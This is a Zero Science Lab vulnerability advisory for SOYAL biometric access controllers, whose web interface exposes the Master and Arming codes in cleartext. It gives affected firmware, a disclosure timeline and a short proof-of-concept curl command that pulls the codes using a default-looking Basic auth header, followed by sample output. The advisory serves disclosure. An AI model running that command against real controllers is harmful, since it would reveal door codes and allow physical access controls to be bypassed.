Title: SOYAL Biometric Access Control System 5.0 Master Code Disclosure
Advisory ID: ZSL-2021-5630
Type: Local/Remote
Impact: Exposure of System Information, Exposure of Sensitive Information
Risk: (3/5)
Release Date: 18.03.2021
Soyal Access systems are built into Raytel Door Entry Systems and are providing access and lift control to many buildings from public and private apartment blocks to prestigious public buildings.
The controller suffers from a cleartext transmission of sensitive information. This allows interception of the HTTP traffic and disclose the Master code and the Arming code via a man-in-the-middle attack. An attacker can obtain these codes to enter into the controllerβs Programming mode and bypass physical security controls in place.
SOYAL Technology Co., Ltd - <https://www.soyal.com>
AR-727 i/CM - F/W: 5.0
AR837E/EF - F/W: 4.3
AR725Ev2 - F/W: 4.3 191231
AR331/725E - F/W: 4.2
AR837E/EF - F/W: 4.1
AR-727CM /i - F/W: 4.09
AR-727CM /i - F/W: 4.06
AR-837E - F/W: 3.03
SOYAL Technology WebServer 2.0
SOYAL Serial Device Server 4.03A
SOYAL Serial Device Server 4.01n
SOYAL Serial Device Server 3.07n
[25.01.2021] Vulnerability discovered.
[03.02.2021] Vendor contacted.
[08.02.2021] No response from the vendor.
[09.02.2021] Distributor responds and informs vendor.
[09.02.2021] Sent details to distributor.
[10.02.2021] Asked distributor for status update.
[11.02.2021] Vendor will patch the issue.
[18.03.2021] Public security advisory released.
Vulnerability discovered by Gjoko Krstic - <[email protected]>
[1] <https://exchange.xforce.ibmcloud.com/vulnerabilities/198552>
[2] <https://www.exploit-db.com/exploits/49676>
[3] <https://cxsecurity.com/issue/WLB-2021030133>
[4] <https://packetstormsecurity.com/files/161874>
[5] <https://www.it.mk/bezbednost-mk-sajber-prostor-i-infrastruktura/>
[6] <https://www.it.mk/istrazuvanje-mk-sajber-infrastruktura-soyal-biometric-access-control-system/>
[7] <https://vulners.com/cve/CVE-2021-28265>
[8] <https://nvd.nist.gov/vuln/detail/CVE-2021-28265>
[18.03.2021] - Initial release
[23.03.2021] - Added reference [1], [2], [3] and [4]
[15.04.2021] - Added reference [5] and [6]
[19.06.2021] - Added reference [7] and [8]
Zero Science Lab
Web: <https://www.zeroscience.mk>
e-mail: [email protected]
<html><body><p>SOYAL Biometric Access Control System 5.0 Master Code Disclosure
Vendor: SOYAL Technology Co., Ltd
Product web page: https://www.soyal.com.tw | https://www.soyal.com
Affected version: AR-727 i/CM - F/W: 5.0
AR837E/EF - F/W: 4.3
AR725Ev2 - F/W: 4.3 191231
AR331/725E - F/W: 4.2
AR837E/EF - F/W: 4.1
AR-727CM /i - F/W: 4.09
AR-727CM /i - F/W: 4.06
AR-837E - F/W: 3.03
Summary: Soyal Access systems are built into Raytel Door Entry Systems
and are providing access and lift control to many buildings from public
and private apartment blocks to prestigious public buildings.
Desc: The controller suffers from a cleartext transmission of sensitive
information. This allows interception of the HTTP traffic and disclose
the Master code and the Arming code via a man-in-the-middle attack. An
attacker can obtain these codes to enter into the controller's Programming
mode and bypass physical security controls in place.
Tested on: SOYAL Technology WebServer 2.0
SOYAL Serial Device Server 4.03A
SOYAL Serial Device Server 4.01n
SOYAL Serial Device Server 3.07n
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2021-5630
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5630.php
25.01.2021
--
$ curl 'http://192.168.1.1/CtrlParam.htm' \
-H 'Authorization: Basic YWRtaW46' | \
grep -ni -B1 'masterCode\|armCode'
</p><td><font face="Arial,Helvetica">Master Code (6 Digital) </font></td>
<td colspan="2"><input maxlength="6" name="masterCode" size="6" type="text" value="123456"/></td>
<td>Arming Code (4 Digital) </td>
<td colspan="2"><input maxlength="4" name="armCode" size="4" type="text" value="1234"/></td>
</body></html>